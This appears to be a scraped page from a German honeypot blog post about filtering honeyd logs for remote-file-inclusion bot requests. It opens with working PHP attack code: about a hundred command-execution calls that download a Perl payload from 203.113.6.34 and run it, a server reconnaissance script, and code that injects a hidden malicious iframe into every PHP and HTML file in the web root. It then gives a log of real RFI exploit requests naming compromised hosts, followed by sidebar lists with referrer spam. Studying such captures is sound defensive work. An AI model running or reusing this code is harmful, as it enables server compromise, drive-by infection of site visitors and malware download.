@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
?>
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "AnakDompu<br />";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "AnakDompu Was Here!!<br />";
echo "uname -a: $un<br />";
echo "os: $os<br />";
echo "uptime: $up<br />";
echo "id: $id1<br />";
echo "pwd: $pwd1<br />";
echo "php: $php1<br />";
echo "software: $sof1<br />";
echo "server-name: $name1<br />";
echo "server-ip: $ip1<br />";
echo "free: $free<br />";
echo "used: $used<br />";
echo "total: $all<br />";
exit;
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src="http://203.113.6.34/adu/home.html"
width="0" height="0" frameborder="0"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>
Tuesday, June 17. 2008
[honeyd]RFI bots?
ich erstelle gerade ein paar filter-scripte zum auswerten der honeyd logs.
dies hier ist ein beispiel ergebnis für ein script das schlicht nach 'GET' und '=http' und 'nicht honey_domain' und 'nicht Referer' filtert:
die entsprechenden dateien auf www.joerg-krug.de wurden bereits entfernt. die anderen habe ich nicht ausprobiert.
wünsch spässkes. :)
CODE:
"GET /test.php?page=http://www.webhostmedic.com/p.c? HTTP/1.1
"GET //errors.php?error=http://www.bbs-bad-harzburg.de/contenido//contenido/includes/sistem.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://nozyk.org/rob.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/31337.txt?? HTTP/1.1
"GET /?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET /contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc/contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /doc/about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
einige sollten mal ihre scripte fixen ;)die entsprechenden dateien auf www.joerg-krug.de wurden bereits entfernt. die anderen habe ich nicht ausprobiert.
wünsch spässkes. :)
Pages
katsumi's page
GROSPOLINA.ORG
Glastopf Webhoneypot
Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina
GROSPOLINA.ORG
Glastopf Webhoneypot
Glastopf Projektseite
Glastopf Subversion/Trac
Glastopf @ grospolina
Links
gut verglast ist ....
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt
GLASBLOG
zeroq's blog:
VIRUSBLOG
Jon.Oberheide's blog:
jon.oberheide.org
offensivecomputing.net:
kishfellow's blog
malware&reversing
Zairon's blog
Bharath m narayan's blog:
Bharath's security blog
botnetz.com:
BOTNETZ
tho's blog:
HoneyBlog
Perforin's virii.lu:
virii.lu
The Outside Of The Asylum:
ab in die anstalt
Quicksearch
Categories
Top Referrers
wappoin.info (24)
androidisin.info (12)
javarussia.info (12)
lovez24.info (12)
meetingua.info (12)
wapzings.info (12)
loves2012.info (11)
mailrupochta.info (11)
bibarok.radio104.ru (9)
makat.viahosting.ru (9)
2012androids.info (8)
24openru.info (8)
androidalgood.info (8)
androiderer.info (8)
androids24.info (8)
androidskachat.info (8)
blogloves.info (8)
durovru.info (8)
etojava.info (8)
htcain.info (8)
htcau.info (8)
htclim.info (8)
htclus.info (8)
htcma.info (8)
androidisin.info (12)
javarussia.info (12)
lovez24.info (12)
meetingua.info (12)
wapzings.info (12)
loves2012.info (11)
mailrupochta.info (11)
bibarok.radio104.ru (9)
makat.viahosting.ru (9)
2012androids.info (8)
24openru.info (8)
androidalgood.info (8)
androiderer.info (8)
androids24.info (8)
androidskachat.info (8)
blogloves.info (8)
durovru.info (8)
etojava.info (8)
htcain.info (8)
htcau.info (8)
htclim.info (8)
htclus.info (8)
htcma.info (8)
Letzte Goggele Suche
4521569111
dlsldododl
d0rk new 2011
ipays exploit
ipays - exploit
pbot dragonfly irc.byroe
Powered by Ollance Member Login Script
"prefix"=>"bodao","maxrand"=>"8",
intitle:© 2011 Powered by Subrion CMS
sandbox 2304 fehler
powered by zoopeer
powered by zoopeer
remote-exploit sathyajith
irc.kamtiez.web.id pbot shot|
irc.cyberirc.org bot
in my world theres no left right grospolina
213.251.169.156 pbot
"Powered By Zoopeer"
"Powered By Zoopeer"
mail.indoserver.web.id
grospolina
"powered by zoopeer"
yourwebinterface.com
Threaded Mode | Linear Mode powered by zoopeer
"@+#+irc.ascnet.biz"
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
dumme musikindustrie
verfassung und verfassungsvertrag guttenberg
"Powered By Zoopeer"
exploit irc rfi bot
dlsldododl
d0rk new 2011
ipays exploit
ipays - exploit
pbot dragonfly irc.byroe
Powered by Ollance Member Login Script
"prefix"=>"bodao","maxrand"=>"8",
intitle:© 2011 Powered by Subrion CMS
sandbox 2304 fehler
powered by zoopeer
powered by zoopeer
remote-exploit sathyajith
irc.kamtiez.web.id pbot shot|
irc.cyberirc.org bot
in my world theres no left right grospolina
213.251.169.156 pbot
"Powered By Zoopeer"
"Powered By Zoopeer"
mail.indoserver.web.id
grospolina
"powered by zoopeer"
yourwebinterface.com
Threaded Mode | Linear Mode powered by zoopeer
"@+#+irc.ascnet.biz"
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
Threaded Mode | Linear Mode powered by zoopeer
dumme musikindustrie
verfassung und verfassungsvertrag guttenberg
"Powered By Zoopeer"
exploit irc rfi bot
Syndicate This Blog
Exploit-db, feed me!
Glasfeed
No RSS/OPML feed selected